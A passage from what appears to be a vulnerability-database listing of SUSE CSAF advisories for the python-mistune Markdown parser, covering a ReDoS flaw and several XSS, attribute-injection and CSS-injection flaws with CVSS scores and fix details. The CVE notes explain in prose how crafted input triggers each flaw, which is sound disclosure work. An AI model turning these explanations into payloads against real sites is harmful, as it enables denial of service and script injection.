"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-33441"
},
{
"cve": "CVE-2026-44897",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44897"
}
],
"notes": [
{
"category": "general",
"text": "unknown",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44897",
"url": "https://www.suse.com/security/cve/CVE-2026-44897"
},
{
"category": "external",
"summary": "SUSE Bug 1264750 for CVE-2026-44897",
"url": "https://bugzilla.suse.com/1264750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44897"
}
]
}
OPENSUSE-SU-2026:20827-1
Vulnerability from csaf_opensuse - Published: 2026-05-28 12:07 - Updated: 2026-05-28 12:07| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch | — |
Vendor Fix
|
| URL | Category |
|---|---|
| https://www.suse.com/support/security/rating/ | external |
| https://ftp.suse.com/pub/projects/security/csaf/o… | self |
| https://bugzilla.suse.com/1264347 | self |
| https://bugzilla.suse.com/1264750 | self |
| https://bugzilla.suse.com/1264751 | self |
| https://bugzilla.suse.com/1264752 | self |
| https://bugzilla.suse.com/1264754 | self |
| https://bugzilla.suse.com/1265052 | self |
| https://bugzilla.suse.com/1265053 | self |
| https://www.suse.com/security/cve/CVE-2026-33079/ | self |
| https://www.suse.com/security/cve/CVE-2026-33441/ | self |
| https://www.suse.com/security/cve/CVE-2026-44708/ | self |
| https://www.suse.com/security/cve/CVE-2026-44896/ | self |
| https://www.suse.com/security/cve/CVE-2026-44897/ | self |
| https://www.suse.com/security/cve/CVE-2026-44898/ | self |
| https://www.suse.com/security/cve/CVE-2026-44899/ | self |
| https://www.suse.com/security/cve/CVE-2026-33079 | external |
| https://bugzilla.suse.com/1264347 | external |
| https://www.suse.com/security/cve/CVE-2026-33441 | external |
| https://bugzilla.suse.com/1264752 | external |
| https://www.suse.com/security/cve/CVE-2026-44708 | external |
| https://bugzilla.suse.com/1264751 | external |
| https://www.suse.com/security/cve/CVE-2026-44896 | external |
| https://bugzilla.suse.com/1264754 | external |
| https://www.suse.com/security/cve/CVE-2026-44897 | external |
| https://bugzilla.suse.com/1264750 | external |
| https://www.suse.com/security/cve/CVE-2026-44898 | external |
| https://bugzilla.suse.com/1265052 | external |
| https://www.suse.com/security/cve/CVE-2026-44899 | external |
| https://bugzilla.suse.com/1265053 | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-mistune",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-mistune fixes the following issues\n\n- CVE-2026-33079: ReDoS in `LINK_TITLE_RE` can lead to denial of service via a crafted Markdown (bsc#1264347).\n- CVE-2026-33441: processing of malformed reference links can lead to excessive resource consumption and denial of\n service (bsc#1264752).\n- CVE-2026-44708: improper HTML escaping in the math plugin can lead to XSS (bsc#1264751).\n- CVE-2026-44896: improper escaping in `render_figure` can lead to attribute injection and XSS (bsc#1264754).\n- CVE-2026-44897: improper sanitization of user-controlled input in `HTMLRenderer.heading` can lead to XSS\n (bsc#1264750).\n- CVE-2026-44898: improper sanitization of user-supplied HTML input in `render_toc_ul` can lead to XSS (bsc#1265052).\n- CVE-2026-44899: improper input verification in Image directive plugin and improper escaping in `render_block_image`\n can lead to CSS injection (bsc#1265053).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-816",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20827-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1264347",
"url": "https://bugzilla.suse.com/1264347"
},
{
"category": "self",
"summary": "SUSE Bug 1264750",
"url": "https://bugzilla.suse.com/1264750"
},
{
"category": "self",
"summary": "SUSE Bug 1264751",
"url": "https://bugzilla.suse.com/1264751"
},
{
"category": "self",
"summary": "SUSE Bug 1264752",
"url": "https://bugzilla.suse.com/1264752"
},
{
"category": "self",
"summary": "SUSE Bug 1264754",
"url": "https://bugzilla.suse.com/1264754"
},
{
"category": "self",
"summary": "SUSE Bug 1265052",
"url": "https://bugzilla.suse.com/1265052"
},
{
"category": "self",
"summary": "SUSE Bug 1265053",
"url": "https://bugzilla.suse.com/1265053"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33079 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33441 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33441/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44708 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44708/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44896 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44896/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44897 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44897/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44898 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44898/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44899 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44899/"
}
],
"title": "Security update for python-mistune",
"tracking": {
"current_release_date": "2026-05-28T12:07:59Z",
"generator": {
"date": "2026-05-28T12:07:59Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20827-1",
"initial_release_date": "2026-05-28T12:07:59Z",
"revision_history": [
{
"date": "2026-05-28T12:07:59Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python313-mistune-3.1.3-160000.3.1.noarch",
"product": {
"name": "python313-mistune-3.1.3-160000.3.1.noarch",
"product_id": "python313-mistune-3.1.3-160000.3.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.1.3-160000.3.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
},
"product_reference": "python313-mistune-3.1.3-160000.3.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33079"
}
],
"notes": [
{
"category": "general",
"text": "In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33079",
"url": "https://www.suse.com/security/cve/CVE-2026-33079"
},
{
"category": "external",
"summary": "SUSE Bug 1264347 for CVE-2026-33079",
"url": "https://bugzilla.suse.com/1264347"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "important"
}
],
"title": "CVE-2026-33079"
},
{
"cve": "CVE-2026-33441",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33441"
}
],
"notes": [
{
"category": "general",
"text": "This CVE is a duplicate of another CVE: CVE-2026-33079.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33441",
"url": "https://www.suse.com/security/cve/CVE-2026-33441"
},
{
"category": "external",
"summary": "SUSE Bug 1264752 for CVE-2026-33441",
"url": "https://bugzilla.suse.com/1264752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "important"
}
],
"title": "CVE-2026-33441"
},
{
"cve": "CVE-2026-44708",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44708"
}
],
"notes": [
{
"category": "general",
"text": "Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, the mistune math plugin renders inline math ($...$) and block math ($$...$$) by concatenating the raw user-supplied content directly into the HTML output without any HTML escaping. This occurs even when the parser is explicitly created with escape=True, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM. This vulnerability is fixed in 3.2.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44708",
"url": "https://www.suse.com/security/cve/CVE-2026-44708"
},
{
"category": "external",
"summary": "SUSE Bug 1264751 for CVE-2026-44708",
"url": "https://bugzilla.suse.com/1264751"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "moderate"
}
],
"title": "CVE-2026-44708"
},
{
"cve": "CVE-2026-44896",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44896"
}
],
"notes": [
{
"category": "general",
"text": "Mistune is a Python Markdown parser with renderers and plugins. In 3.2.0 and realier, in src/mistune/directives/image.py, the render_figure() function concatenates figclass and figwidth options directly into HTML attributes without escaping. This allows attribute injection and XSS even when HTMLRenderer(escape=True) is used, because these values bypass the inline renderer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44896",
"url": "https://www.suse.com/security/cve/CVE-2026-44896"
},
{
"category": "external",
"summary": "SUSE Bug 1264754 for CVE-2026-44896",
"url": "https://bugzilla.suse.com/1264754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "moderate"
}
],
"title": "CVE-2026-44896"
},
{
"cve": "CVE-2026-44897",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44897"
}
],
"notes": [
{
"category": "general",
"text": "Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, HTMLRenderer.heading() builds the opening \u003chN\u003e tag by string-concatenating the id attribute value directly into the HTML - with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character \" in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element. This vulnerability is fixed in 3.2.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44897",
"url": "https://www.suse.com/security/cve/CVE-2026-44897"
},
{
"category": "external",
"summary": "SUSE Bug 1264750 for CVE-2026-44897",
"url": "https://bugzilla.suse.com/1264750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "moderate"
}
],
"title": "CVE-2026-44897"
},
{
"cve": "CVE-2026-44898",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44898"
}
],
"notes": [
{
"category": "general",
"text": "Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a \u003cul\u003e table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href=\"#\u003cid\u003e\") and the text value (used as the visible link label) are inserted into \u003ca\u003e tags via a plain Python format string - with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href=\"#...\" attribute context, injecting arbitrary HTML tags including \u003cscript\u003e blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44898",
"url": "https://www.suse.com/security/cve/CVE-2026-44898"
},
{
"category": "external",
"summary": "SUSE Bug 1265052 for CVE-2026-44898",
"url": "https://bugzilla.suse.com/1265052"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "moderate"
}
],
"title": "CVE-2026-44898"
},
{
"cve": "CVE-2026-44899",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44899"
}
],
"notes": [
{
"category": "general",
"text": "Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, the Image directive plugin validates the :width: and :height: options with a regex compiled as _num_re = re.compile(r\"^\\d+(?:\\.\\d*)?\"). When the validated value is not a plain integer, render_block_image() inserts it directly into a style=\"width:...;\" or style=\"height:...;\" attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the style= attribute verbatim and without escaping. This vulnerability is fixed in 3.2.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44899",
"url": "https://www.suse.com/security/cve/CVE-2026-44899"
},
{
"category": "external",
"summary": "SUSE Bug 1265053 for CVE-2026-44899",
"url": "https://bugzilla.suse.com/1265053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:python313-mistune-3.1.3-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-28T12:07:59Z",
"details": "moderate"
}
],
"title": "CVE-2026-44899"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.